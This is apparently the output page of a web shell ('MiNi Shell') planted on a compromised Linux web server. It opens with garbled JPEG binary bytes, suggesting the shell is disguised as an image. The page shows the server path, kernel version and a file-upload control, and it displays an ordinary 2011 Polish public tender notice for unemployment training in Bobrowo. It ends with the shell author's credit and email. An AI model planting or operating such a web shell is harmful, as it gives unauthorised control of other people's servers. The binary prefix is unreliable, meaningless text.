JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110520/123456-N-2011.html

<p class="kh_header"><b>Bobrowo: Zorganizowanie i przeprowadzenie  szkoleń  aktywizacyjnych i zawodowych oraz innych usług wspierających dla osób bezrobotnych i nieaktywnych zawodowo korzystających ze wsparcia GOPS w Bobrowie  w ramach projektu Aktywni bez względu na wiek, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu  Społecznego, Priorytet VII Programu Operacyjnego Kapitał Ludzki - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez  ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 123456 - 2011; data zamieszczenia: 20.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Bobrowo 27, 87-327 Bobrowo, woj. kujawsko-pomorskie, tel. 56 4775610, faks 56 4951810.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bobrowo.org.pl  zakładka gops</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  szkoleń  aktywizacyjnych i zawodowych oraz innych usług wspierających dla osób bezrobotnych i nieaktywnych zawodowo korzystających ze wsparcia GOPS w Bobrowie  w ramach projektu Aktywni bez względu na wiek, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu  Społecznego, Priorytet VII Programu Operacyjnego Kapitał Ludzki - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez  ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - dotyczy usług dla 10  uczestników projektu objętych Programem Aktywności Lokalnej
1. Zorganizowanie szkoleń aktywizacyjnych w czerwcu 2011r. dla 10 osób ( w tym 2 osoby niepełnosprawne z lekkim oraz umiarkowanym stopniem niepełnosprawności).

Szkolenia aktywizacyjne obejmujące 30 godzin szkolenia dla każdego uczestnika projektu podczas, których prowadzone będą zajęcia z zakresu:
-  aktywnego poszukiwania pracy, w tym doradcy zawodowego,
-  nabycie umiejętności poruszania się po rynku pracy, przygotowania dokumentów     
    aplikacyjnych, przygotowania do rozmowy kwalifikacyjnej,

2.  Zorganizowanie szkoleń zawodowych dla 10 uczestników projektu (min. 100 godz. szkolenia na 1 uczestnika) w okresie czerwiec - sierpień 2011r., szkolenia z zakresu:
a)  opiekunka osób starszych - 3 osoby (w tym 1 osoba z lekkim stopniem niepełnosprawności),
b)  podstawowy kurs  fryzjerski - 1 osoba,
c)  stylizacja paznokci manicure i pedicure oraz wizaż - 1 osoba,
d)  kelner z dekoracją stołów - 2 osoby,
e)  magazynier z obsługą wózków jezdniowych - 2 osoby. (w tym 1 osoba z umiarkowanym 
     stopniem niepełnosprawności),
f)  kurs malarz - szpachlarz - 1 osoba,

3.  Przeprowadzenie wśród 10 uczestników projektu włączonych do Programu Aktywności Lokalnej badań specjalistycznych w związku z możliwością podjęcia przez nich zatrudnienia - w miesiącu lipcu 2011r.
4.  Organizowanie i finansowanie treningów kompetencji i umiejętności społecznych, tj. grupowe warsztaty psychologiczno - pedagogiczne (4 spotkania po 4 godz. - łącznie 16 godz. warsztatów) dla 10 uczestników objętych Programem Aktywności Lokalnej oraz osób z ich otoczenia (rodzina sąsiedzi, znajomi):
- warsztaty mają być prowadzone przez psychologa oraz pedagoga,
- warsztaty należy przeprowadzić w okresie czerwiec - sierpień 2011r.,
- warsztaty powinny odbywać się na terenie Gminy Bobrowo.
- po przeprowadzeniu każdego warsztatu psychologiczno - pedagogicznego należy
sporządzić protokół i przekazać go do GOPS w Bobrowie wraz z listą obecności.
5.  Zorganizowanie wyjazdu integracyjnego do miejscowości nadmorskiej w sierpniu 2011r. dla 20 osób, w tym 10 osób włączonych do Programu Aktywności Lokalnej oraz 10 osób z ich otoczenia.
Podczas wyjazdu musi zostać zapewniony:
-wynajem autokaru i transport,
- przewodnik,
- bilety,
- catering - gorący posiłek,
-ubezpieczenie  każdego uczestnika wyjazdu.
6. Wydanie zaświadczeń/certyfikatów potwierdzających zdobyte umiejętności przez 10 uczestników projektu włączonych do Programu Aktywności Lokalnej - w sierpniu 2011r., jednak nie później niż 14 dni od zakończenia przez uczestników udziału w programie integracji społecznej i zawodowej (tj. szkoleń zawodowych, warsztatów psychologiczno - pedagogicznych).

Część II - dotyczy usług dla 10 uczestników projektu objętych kontraktem socjalnym
1.  Zorganizowanie szkoleń aktywizacyjnych dla 10 uczestników projektu objętych
kontraktami socjalnymi w sierpniu 2011r.

Szkolenia aktywizacyjne obejmujące 30 godzin szkolenia dla każdego uczestnika projektu
podczas, których prowadzone będą zajęcia z zakresu:
- aktywnego poszukiwania pracy, w tym doradcy zawodowego,
- nabycie umiejętności poruszania się po rynku pracy, przygotowania dokumentów
   aplikacyjnych, przygotowania do rozmowy kwalifikacyjnej,

2.  Zorganizowanie szkoleń zawodowych dla 10 uczestników projektu (min. 160 godz. szkolenia na 1 uczestnika) w okresie sierpień - listopad 2011r., szkolenia z zakresu:
a) obsługa komputera z Internetem - 2 osoby,
b) ABC przedsiębiorczości - 1 osoba,
c) opiekunka osób starszych - 3 osoby,
d) podstawowy kurs fryzjerski - 1 osoba,
e) kurs krawiecki - 1 osoba,
f) kurs kelnera z dekoracją stołów - 1 osoba,
g) kurs brukarza - 1 osoba.

3.  Przeprowadzenie wśród 10 uczestników projektu objętych kontraktami socjalnymi badań specjalistycznych w związku z możliwością podjęcia przez nich zatrudnienia - we wrześniu 2011r.
4. Zorganizowanie w okresie sierpień - listopad 2011r. indywidualnych konsultacji psychologicznych dla 10 osób. 
Należy zorganizować po 4 półgodzinne spotkania z psychologiem dla każdego uczestnika projektu - razem 20 godzin konsultacji psychologicznych.
Psycholog, którego zatrudni firma szkoleniowa jest zobowiązany do przedstawienia protokołu z odbytych spotkań oraz listy obecności.
5.  Zorganizowanie wyjazdu integracyjnego do miejscowości nadmorskiej we wrześniu 2011r. dla 10 osób objętych kontraktami socjalnymi.
Podczas wyjazdu musi zostać zapewniony:
-wynajem autokaru i transport,
- przewodnik,
- bilety,
- catering - gorący posiłek,
- ubezpieczenie każdego uczestnika wyjazdu.
6.  Wydanie zaświadczeń/certyfikatów potwierdzających zdobyte umiejętności przez 10 uczestników projektu objętych kontraktami socjalnymi - w I połowie grudnia 2011r., jednak nie później niż 14 dni od zakończenia przez uczestników udziału w programie integracji społecznej i zawodowej (tj. szkoleń zawodowych, spotkań z psychologiem),

 ponadto Wykonawca jest  zobowiązany:
a)  zapewnić sale szkoleniowe  wraz z niezbędnym sprzętem multimedialnym i innymi 
materiałami niezbędnymi do prowadzenia szkolenia oraz nagłośnienie i obsługę,
b)  miejsce szkolenia: preferowana Brodnica,
c) Wykonawca ma obowiązek organizacyjnego i merytorycznego przygotowania szkolenia. Szczegółowy harmonogram szkoleń zostanie ustalony pomiędzy Wykonawcą a Zamawiającym przed rozpoczęciem realizacji zamówienia, 
d)  łączny czas zajęć w ciągu jednego dnia nie może przekraczać 8 godzin szkoleniowych (1 godzina szkoleniowa odpowiada 1 godzinie lekcyjnej tj. 45 minut),
e) zajęcia teoretyczne powinny odbywać się w dniach roboczych  miedzy godz. 8:00 a 16:00,
f)  zapewnić niezbędne materiały dydaktyczne uczestnikom szkoleń oraz ewent. odzież ochronną i obuwie,
g)  zapewnić konieczny sprzęt, jaki powinien zostać dostarczony uczestnikom na czas trwania szkolenia. Wyposażenie bazy szkoleniowej powinno umożliwić każdemu uczestnikowi kursu poznanie i przyuczenie się do pracy w zawodzie będącym przedmiotem szkolenia,
h)  zapewnić uczestnikom w każdym dniu szkolenia catering, tj. napoje (kawa, herbata, woda mineralna, cukier), ciastka oraz ciepły posiłek,
i)  zapewnić możliwość stałego, bezpośredniego kontaktu z zamawiającym,
j)  ubezpieczyć skierowane osoby od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia,
k)  zapewnić warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia,
l)  firma szkoleniowa jest zobowiązana do prowadzenia w trakcie szkoleń/kursów dzienników zajęć oraz list obecności.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
przepisy prawa nakładają obowiązek posiadania takich uprawnień: 
Warunek powyższy zostanie spełniony, jeżeli Wykonawca przedłoży stosowne zezwolenie potwierdzające, że instytucja szkoleniowa posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej np. aktualne zaświadczenie o wpisie Wykonawcy do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy włściwy ze względu na siedzibę Wykonawcy (podstawa prawna art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy tj. Dz.U. z 2008 Nr 69 poz. 415 z późno zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże i udokumentuje wykonanie usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu skladania ofert (czyli usługi szkoleniowe o podobnej tematyce jak przedmiot zamówienia o wartości co najmniej 30.000,00 zł brutto każda). a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz udokumentuje powyższy fakt dokumentami (np. referencjami) potwierdzającymi, że usługi zostały wykonane należycie. Obligatoryjne i wiążące jest wykazanie w podanym wyżej okresie co najmniej dwóch usług szkoleniowych o podobnej tematyce jak przedmiot zamówienia o wartości co najmniej 30.000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia. Wykaz powinien zawierać informacje na temat sali szkoleniowej i jej wyposażenia, ilości stanowisk szkoleniowych oraz zaplecza sanitarnego. Wymagana jest również informacja na temat prawa do dysponowania potencjałem technicznym, a w przypadku korzystania z zasobów innego podmiotu/innych podmiotów - pisemne zobowiązanie podmiotu/podmiotów do udostępnienia tychże zasobów na potrzeby szkolenia. Wykonawca, którego wykaz i dołączone do niego dodatkowe dokumenty (dotyczące prawa do dysponowania zasobami) będą wskazywać na dysponowanie przez niego bazą i potencjałem technicznym oraz odpowiednimi warunkami socjalnymi i wyposażeniem dydaktycznym, niezbędnymi do prowadzenia szkolenia w przedmiotowym zakresie zgodnie z wymaganiami określonymi w niniejszej specyfikacji, będzie spełniać ten warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia. Wykaz powinien zawierać informacje na temat sali szkoleniowej i jej wyposażenia, ilości stanowisk szkoleniowych oraz zaplecza sanitarnego. Wymagana jest również informacja na temat prawa do dysponowania potencjałem technicznym, a w przypadku korzystania z zasobów innego podmiotu/innych podmiotów - pisemne zobowiązanie podmiotu/podmiotów do udostępnienia tychże zasobów na potrzeby szkolenia. Wykonawca, którego wykaz i dołączone do niego dodatkowe dokumenty (dotyczące prawa do dysponowania zasobami) będą wskazywać na dysponowanie przez niego bazą i potencjałem technicznym oraz odpowiednimi warunkami socjalnymi i wyposażeniem dydaktycznym, niezbędnymi do prowadzenia szkolenia w przedmiotowym zakresie zgodnie z wymaganiami określonymi w niniejszej specyfikacji, będzie spełniać ten warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie załączonego do oferty oświadczenia wykonawcy o znajdowaniu się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia. Wykonawca, który złoży stosowne oświadczenie, będzie spełniać ten warunek oraz nie .podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy Pzp i spełniają wymogi określone w treści Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy: 
l) nastąpi zmniejszenie liczby uczestników szkolenia, 
2) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, 
3) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca Stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowana jest Umowa, 
4) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, 
5) wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, 
6) dotyczyć one będą zmian teleadresowych Stron Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bobrowo.org.pl  zakładka gops<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Bobrowie, Bobrowo 27, 87-327 Bobrowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2011 godzina 11:00, miejsce: Sekretariat Urzędu Gminy w Bobrowie, Bobrowo 27, 87-327 Bobrowo pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz  Społeczny, Priorytet VII Programu Operacyjnego Kapitał Ludzki - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez  ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com